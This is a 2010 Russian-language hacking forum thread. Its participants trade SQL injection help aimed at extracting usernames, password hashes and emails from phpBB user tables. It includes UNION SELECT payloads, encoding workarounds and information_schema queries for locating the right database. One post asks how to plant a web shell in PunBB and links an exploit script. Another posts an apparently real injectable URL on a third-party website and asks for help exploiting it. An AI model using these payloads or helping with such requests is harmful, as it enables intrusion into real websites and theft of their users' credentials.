HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.04.2010, 00:01
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами: 8603287

Репутация: 87
По умолчанию

Цитата:
Сообщение от Konqi  
ребят помогите са скулом есть таблица phpbb_users

table_rows возвращает 4186

а когда делаю запрос union+select+1,2+from+phpbb_users--
выдает ошибку help!!

from+phpbb_users where table_schema='база с таблицой phpbb_users'
 
Ответить с цитированием

  #2  
Старый 09.04.2010, 21:42
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами: 9347610

Репутация: 165
По умолчанию

union+select+concat_ws(0x3a,username,user_password ,user_email,user_icq),2+from+ph pbb_users--
 
Ответить с цитированием

  #3  
Старый 09.04.2010, 21:46
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от SeNaP  
union+select+concat_ws(0x3a,username,user_password ,user_email,user_icq),2+from+ph pbb_users--
Дело Не в Этом,просто не дает вывести инфу с таблицы ..а запрос правильный
 
Ответить с цитированием

  #4  
Старый 09.04.2010, 22:08
PaCo
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
С нами: 9610769

Репутация: 380
По умолчанию

Konqi телепатов нет - какую ошибку выдает? Мейби с кодировкой что то не то и нужно например unhex(hex(, e.g.: union+select+unhex(hex(concat_ws(0x3a,username,use r_password ,user_email,user_icq))),2+from+ph pbb_users--
 
Ответить с цитированием

  #5  
Старый 09.04.2010, 22:12
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

+union+select+1,2+from+information_schema.tables NORM

+union+select+1,2+from+phpbb_users ERROR

но знаю что таблица существует

table_rows возвращает 4186 ,значит таблица не пуста
 
Ответить с цитированием

  #6  
Старый 09.04.2010, 22:21
PaCo
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
С нами: 9610769

Репутация: 380
По умолчанию

Возможно что:
1)Проблемы с кодировкой, как можно решить описал.
2)Не достаточно грантов на phpbb_users.
3)phpbb_users нет.
4)Какая то хитрая гверя или скрипт выполняющий запрос что то меняет(мало вероятно).
5)ХЗ.
 
Ответить с цитированием

  #7  
Старый 09.04.2010, 22:29
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Konqi
Когда Вы научитесь читать что-то?

Даю 99% что таблица в другой базе, этот вопрос сдесь задавали раз 500
Цитата:
Сообщение от PaCo  
2)Не достаточно грантов на phpbb_users.
.
В мускуле нельзя разграничить права на таблицы, только базы
 
Ответить с цитированием

  #8  
Старый 09.04.2010, 22:35
daniel_1024
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
С нами: 8854580

Репутация: 34
По умолчанию

есть способы заливки шелла в PunBB 1.2.15 с правами админа ?
пробывал сплоент http://www.security.nnov.ru/files/punBB_spl.pl, не работает
 
Ответить с цитированием

  #9  
Старый 10.04.2010, 00:25
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами: 10024314

Репутация: 739
По умолчанию

Cначало
Цитата:
select table_schema from information_schema.tables where table_name='phpbb_users'
Выдаёт базу.Потом:
Цитата:
select username,user_password from база.phpbb_users
 
Ответить с цитированием

  #10  
Старый 10.04.2010, 00:28
Darren
Banned
Регистрация: 14.06.2008
Сообщений: 34
С нами: 9424793

Репутация: 13
По умолчанию

http://www.nzp.co.nz/company.php?pg=79/**/order/**/by/**/4/*

помогите раскрутить скуль
Как я понял выводится только через ошибку
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.